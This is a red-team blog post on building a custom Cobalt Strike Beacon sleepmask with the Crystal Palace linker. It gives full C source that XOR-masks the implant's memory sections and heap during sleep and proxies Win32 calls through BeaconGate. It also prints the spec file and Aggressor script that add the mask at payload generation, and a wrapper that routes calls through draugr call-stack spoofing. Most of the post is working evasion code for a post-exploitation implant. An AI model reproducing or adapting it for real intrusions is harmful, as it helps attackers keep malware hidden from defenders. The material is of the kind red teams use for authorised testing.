09 Apr 2026 8 min read

Crystal Mask

The goal of Crystal Palace (and the Tradecraft Garden) is to separate evasion tradecraft from the capability. This means that a capability (such as a DLL) has no evasion built into it; and that evasion is weaved in at link-time in a manner that the capability is not aware of (nor designed to accommodate). The primary advantage of this philosophy is that you can swap different tradecraft in and out, without having to rebuild the entire capability.

Cobalt Strike's post-exploitation agent, Beacon, is designed for users to leverage their own evasion tradecraft, but it does so in a fundamentally different way. Beacon's sleepmask is a BOF, which Beacon explicitly calls into when it wants to execute a Win32 API that's supported by BeaconGate. This is therefore evasion that Beacon is aware of and acommodates.

Crystal Kit was my experiment to disable Beacon's built-in customisation options and apply evasion tradecraft via Crystal Palace's hooking primitive.

This works by hooking Beacon's IAT and redirecting API calls to functions within a memory-loaded PICO. These hook functions are where evasion tradecraft, like call stack spoofing, are implemented.

Having had time and experience working with the codebase, I've started to get a good feel for some of the upsides and downsides of this approach. Without a doubt, the biggest upside is the freedom and flexibility that it provides. For instance, we can force APIs that are not supported by BeaconGate, such as CreateProcess, through evasion tradecraft because we're not constrained by what the capability (Beacon) can provide.

On the flip side, one of the downsides is the amount of extra work you have to do as a developer. This became apparent to me when implementing memory obfuscations on sleep. One of the requirements of memory obfuscation is knowing the address and size of each memory allocation that you want to mask. For a capability such as Beacon, this can be solved by passing information about memory allocations from the reflective loader. For dynamic allocations made at runtime (such as heap memory), you can hook HeapAlloc, HeapReAlloc, and HeapFree, and manually keep track of every allocation that's created, resized, and freed.

However, Beacon already has several software 'contracts' with the reflective loader and the sleepmask that make this process a whole lot easier. Beacon's default reflective loader passes information to Beacon (via BUD) about the memory that Beacon is loaded into. When Beacon calls into the sleepmask, it does so with the following function:

void sleep_mask ( PBEACON_INFO beacon_info, PFUNCTION_CALL function_call );

FUNCTION_CALL is a structure that contains information about what Win32 API Beacon wants to call. This could be Sleep (for standard HTTP/DNS Beacons), or another API supported by BeaconGate (such as OpenProcess).

BEACON_INFO is a structure that contains information about Beacon's memory allocations. This includes memory that Beacon is loaded into (provided by the reflective loader via BUD); and heap memory that Beacon has allocated for itself. That is to say, Beacon tracks its heap memory for you. There are also a few BOF APIs like BeaconGetSyscallInformation and BeaconGetCustomUserData, which support you in doing custom things in colaboration with the reflective loader.

This is pretty nice for scenarios where you may want a custom sleepmask but with the default loader - as you can just consume the information that's already available. Likewise, you could use the default sleepmask and a custom loader; or of course, completely custom loaders and sleepmasks (even made by different people). As long as these contracts are properly observed, these components will play nicely with each other.

Basic Mask

Since the sleepmask is just a BOF (i.e. a COFF with exposure to Beacon-specific APIs), a question that came to my mind was: can we merge and weave custom evasion tradecraft into a COFF (à la BOF Cocktails) and maintain the existing software contract with Beacon? Turns out, the answer is a very easy yes.

We already have access to the relevant header files thanks to the sleepmask-vs project, so we just need to write a minimal implementation to mask memory, make the API call, then unmask memory.

💡

You don't actually have to mask memory at all, it's just my assumption that you'd want to.

This is my basic code in its entirety:

#include <windows.h>
#include "beacon.h"
#include "sleepmask.h"
#include "beacon_gate.h"
#include "tcg.h"

DECLSPEC_IMPORT BOOL WINAPI KERNEL32$VirtualProtect ( LPVOID, SIZE_T, DWORD, PDWORD );

void gate_wrapper ( PFUNCTION_CALL function_call )
{
    ULONG_PTR result = 0;

    switch ( function_call->numOfArgs )
    {
    case 0:
        result = beaconGate ( 00 ) ( );
        break;

    case 1:
        result = beaconGate ( 01 ) ( arg ( 0 ) );
        break;

    case 2:
        result = beaconGate ( 02 ) ( arg ( 0 ), arg ( 1 ) );
        break;

    case 3:
        result = beaconGate ( 03 ) ( arg ( 0 ), arg ( 1 ), arg ( 2 ) );
        break;

    case 4:
        result = beaconGate ( 04 ) ( arg ( 0 ), arg ( 1 ), arg ( 2 ), arg ( 3 ) );
        break;

    case 5:
        result = beaconGate ( 05 ) ( arg ( 0 ), arg ( 1 ), arg ( 2 ), arg ( 3 ), arg ( 4 ) );
        break;

    case 6:
        result = beaconGate ( 06 ) ( arg ( 0 ), arg ( 1 ), arg ( 2 ), arg ( 3 ), arg ( 4 ), arg ( 5 ) );
        break;

    case 7:
        result = beaconGate ( 07 ) ( arg ( 0 ), arg ( 1 ), arg ( 2 ), arg ( 3 ), arg ( 4 ), arg ( 5 ), arg ( 6 ) );
        break;

    case 8:
        result = beaconGate ( 08 ) ( arg ( 0 ), arg ( 1 ), arg ( 2 ), arg ( 3 ), arg ( 4 ), arg ( 5 ), arg ( 6 ), arg ( 7 ) );
        break;

    case 9:
        result = beaconGate ( 09 ) ( arg ( 0 ), arg ( 1 ), arg ( 2 ), arg ( 3 ), arg ( 4 ), arg ( 5 ), arg ( 6 ), arg ( 7 ), arg ( 8 ) );
        break;

    case 10:
        result = beaconGate ( 10 ) ( arg ( 0 ), arg ( 1 ), arg ( 2 ), arg ( 3 ), arg ( 4 ), arg ( 5 ), arg ( 6 ), arg ( 7 ), arg ( 8 ), arg ( 9 ) );
        break;
    
    default:
        break;
    }

    function_call->retValue = result;
}

void xor ( char * buffer, size_t buffer_len, char * key, size_t key_len )
{
    for ( size_t i = 0; i < buffer_len; i++ )
    {
        buffer [ i ] ^= key [ i % key_len ];
    }
}

BOOL can_write ( DWORD protection )
{
    switch (protection)
    {
    case PAGE_EXECUTE_READWRITE:
    case PAGE_EXECUTE_WRITECOPY:
    case PAGE_READWRITE:
    case PAGE_WRITECOPY:
        return TRUE;
    
    default:
        return FALSE;
    }
}

void mask_section ( PALLOCATED_MEMORY_SECTION section, char * key, BOOL mask )
{
    DWORD old_protection = 0;

    // if we're masking but section not writable
    if ( mask && ! can_write ( section->CurrentProtect ) )
    {
        // make it writable
        if ( KERNEL32$VirtualProtect ( section->BaseAddress, section->VirtualSize, PAGE_READWRITE, &old_protection ) )
        {
            section->CurrentProtect  = PAGE_READWRITE;
            section->PreviousProtect = old_protection;
        }
    }

    if ( can_write ( section->CurrentProtect ) ) {
        // xor the memory
        xor ( section->BaseAddress, section->VirtualSize, key, MASK_SIZE );
    }

    // if we're unmasking and a section's permission has changed
    if ( ! mask && section->CurrentProtect != section->PreviousProtect )
    {
        // set section permissions back to what they were
        if ( KERNEL32$VirtualProtect ( section->BaseAddress, section->VirtualSize, section->PreviousProtect, &old_protection ) )
        {
            section->CurrentProtect  = section->PreviousProtect;
            section->PreviousProtect = old_protection;
        }
    }
}

void mask_regions ( PBEACON_INFO beacon_info, BOOL mask )
{
    int region_count = sizeof ( beacon_info->allocatedMemory.AllocatedMemoryRegions ) / sizeof ( ALLOCATED_MEMORY_REGION );
    
    // loop over each region
    for ( size_t i = 0; i < region_count; i++ )
    {
        ALLOCATED_MEMORY_REGION region = beacon_info->allocatedMemory.AllocatedMemoryRegions[i];

        // look for beacon's region
        if ( region.Purpose == PURPOSE_BEACON_MEMORY )
        {
            int section_count = sizeof ( region.Sections ) / sizeof ( ALLOCATED_MEMORY_SECTION );
    
            // loop over each beacon section
            for ( int i = 0; i < section_count; i++ )
            {
                ALLOCATED_MEMORY_SECTION section = region.Sections[i];

                if ( section.MaskSection )
                {
                    mask_section ( &section, beacon_info->mask, mask );
                }
            }

            break;
        }
    }
}

void mask_heap ( PBEACON_INFO beacon_info )
{
    int count = 0;

    do
    {
        xor ( beacon_info->heap_records[count].ptr, beacon_info->heap_records[count].size, beacon_info->mask, MASK_SIZE );
        count++;

    } while ( beacon_info->heap_records[count].ptr != NULL );
}

void mask_memory ( PBEACON_INFO beacon_info, BOOL mask )
{
    // mask beacon region
    mask_regions ( beacon_info, mask );

    // mask heap memory
    mask_heap ( beacon_info );
}

void go ( PBEACON_INFO beacon_info, PFUNCTION_CALL function_call )
{
    if ( function_call->bMask ) {
        dprintf ( "Masking memory...\n" );
        mask_memory ( beacon_info, TRUE );
    }

    // make the call
    dprintf ( "Calling WinApi #%d\n", function_call->function );
    gate_wrapper ( function_call );

    if ( function_call->bMask ) {
        dprintf ( "Restoring memory...\n" );
        mask_memory ( beacon_info, FALSE );
    }
}

sleepmask.c

💡

You'll notice that there's no evasion tradecraft here because we want to weave that in at link-time (i.e. when a Beacon payload is generated).

The specification file to make this work is really small. All we do is load the built object file from disk, run it through the make coff command, and then export it.

x64:
    load "bin/sleepmask.x64.o"
        make coff +optimize
        mergelib "libtcg.x64.zip"

    export

sleepmask.spec

Then, to hook this into the payload pipeline, we use the BEACON_SLEEP_MASK hook.

import crystalpalace.spec.* from: crystalpalace.jar;
import java.util.HashMap;

# BEACON_SLEEP_MASK HOOK
# $1 = beacon type (default, smb, tcp)
# $2 = arch
set BEACON_SLEEP_MASK
{
   local ( '$path $spec $cap $coff $final' );

   $path = getFileProper ( script_resource ( ), "sleepmask.spec" );
   
   $spec = [ LinkSpec Parse: $path ];
   $cap  = [ Capability None: $2 ];
   $coff = [ $spec run: $cap, [ new HashMap ] ];

   $final = bof_extract ( $coff, "go" );

   return $final;
}

sleepmask.cna

The following screenshot shows this in action.

Evasive Mask

To weave evasion tradecraft over the top of this default sleepmask, build additional source files that implement your techniques (or utilise a shared ZIP library), and integrate them into the spec file. The following is an example of replacing the vanilla function calls with those that go through a draugr call stack spoofing technique.

#include <windows.h>
#include "beacon_gate.h"
#include "spoof.h"

void draugr_gate_wrapper ( PFUNCTION_CALL function_call )
{
    DRAUGR_CALL call = { 0 };

    call.ptr  = function_call->functionPtr;
    call.argc = function_call->numOfArgs;
    
    call.args [ 0 ] = arg ( 0 );
    call.args [ 1 ] = arg ( 1 );
    call.args [ 2 ] = arg ( 2 );
    call.args [ 3 ] = arg ( 3 );
    call.args [ 4 ] = arg ( 4 );
    call.args [ 5 ] = arg ( 5 );
    call.args [ 6 ] = arg ( 6 );
    call.args [ 7 ] = arg ( 7 );
    call.args [ 8 ] = arg ( 8 );
    call.args [ 9 ] = arg ( 9 );

    function_call->retValue = spoof_call ( &call );
}

draugr_gate.c

In the spec file, I've just created a new label called .draugr and hardcoded it into the main x64 block. However, you can modify this to suit your needs better. You could pass the desired technique in as a variable (from the Aggressor script), which you could even set through the Cobalt Strike UI (similar to how sleepmask-vs does it).

x64:
    load "bin/sleepmask.x64.o"
        make coff +optimize

    # weave my evasion
    .draugr
    
    mergelib "libtcg.x64.zip"
    export

draugr.x64:
    # merge the call stack spoofing
    load "bin/spoof.x64.o"
        merge

    # merge the asm stub
    load "bin/draugr.x64.bin"
        linkfunc "draugr_stub"

    # merge the new wrapper
    load "bin/draugr_wrapper.x64.o"
        merge

    # redirect call sites
    redirect "gate_wrapper" "draugr_gate_wrapper"

These additional steps will merge the evasion tradecraft into the COFF and then replaces the call to the default gate_wrapper function to my new draugr_gate_wrapper one.

💡

The +optimize option in the spec file ensures that any unreferenced code (gate_wrapper in this case) is omitted from the final COFF.

The following screenshot demonstrates this sleepmask in action:

Other Crytal Palace primitives, such as ised will work here too. See Islands of Invariance for more info on that.

Consulsion

This post has described two approaches for evasion - one where the capability has no knowledge and one where it does. Both have their pros and cons. The 'no knowledge' approach is good for flexibility, and may even be your only option depending on the capability. But the 'has knowledge' approach also has its benefits, particularly when it comes to ease-of-use and compatibility between components.

Crystal Kit's sleepmask PICO is tightly coupled to its own reflective loader. You cannot mix and match Crystal Kit's sleepmask with another loader; nor its loader with another sleepmask. Whether or not that's a good thing may be down to individual opinion. I think it would be better, overall, if you could mix and match.

However, exporting a merged COFF from Crystal Palace doesn't solve limitions in places like BeaconGate, so I guess the important thing is that we have options and can decide on the best approach for our needs.